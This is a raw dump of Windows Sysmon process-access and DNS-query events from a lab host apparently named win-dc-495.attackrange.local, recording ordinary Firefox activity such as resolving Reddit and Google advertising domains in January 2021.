Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla 
Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.447{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.447{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.447{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.300{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.300{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.269{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.582{59A5CD1D-945A-6005-3305-00000000A301}7052watch.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.427{59A5CD1D-945A-6005-3305-00000000A301}7052id.rlcdn.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.426{59A5CD1D-945A-6005-3305-00000000A301}7052id.rlcdn.com034.120.207.148;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.425{59A5CD1D-945A-6005-3305-00000000A301}7052id.rlcdn.com0::ffff:34.120.207.148;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.114{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com02a00:1450:4001:802::2008;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.112{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com0142.250.74.200;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.112{59A5CD1D-945A-6005-3305-00000000A301}7052www.googletagmanager.com0type: 5 www-googletagmanager.l.google.com;::ffff:142.250.74.200;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.981{59A5CD1D-8E56-6005-2E00-00000000A301}2464168.114.84.104.in-addr.arpa.0type: 12 a104-84-114-168.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000017726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.097{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.707{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.707{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.300{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.238{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.423{59A5CD1D-945A-6005-3305-00000000A301}7052reddit-d.openx.net0::ffff:34.98.64.218;::ffff:35.244.159.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.245{59A5CD1D-945A-6005-3305-00000000A301}7052pagead2.googlesyndication.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.712{59A5CD1D-945A-6005-3305-00000000A301}7052pagead-googlehosted.l.google.com02a00:1450:4001:821::2001;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.710{59A5CD1D-945A-6005-3305-00000000A301}7052pagead-googlehosted.l.google.com0216.58.207.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:29.709{59A5CD1D-945A-6005-3305-00000000A301}7052d374b609c84e896b78ac3e4ad36ed706.safeframe.googlesyndication.com0type: 5 pagead-googlehosted.l.google.com;::ffff:216.58.207.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.687{59A5CD1D-945A-6005-3305-00000000A301}7052tpc.googlesyndication.com02a00:1450:4001:818::2001;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.685{59A5CD1D-945A-6005-3305-00000000A301}7052tpc.googlesyndication.com0216.58.212.161;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.685{59A5CD1D-945A-6005-3305-00000000A301}7052tpc.googlesyndication.com0::ffff:216.58.212.161;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.031{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f8.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.029{59A5CD1D-8E56-6005-2E00-00000000A301}2464148.207.120.34.in-addr.arpa.0type: 12 148.207.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000017755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.008{59A5CD1D-8E56-6005-2E00-00000000A301}2464194.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f2.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.922{59A5CD1D-945A-6005-3305-00000000A301}7052gateway.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla 
Firefox\firefox.exe 10341000x800000000000000017787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.785{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.785{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program 
Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.675{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 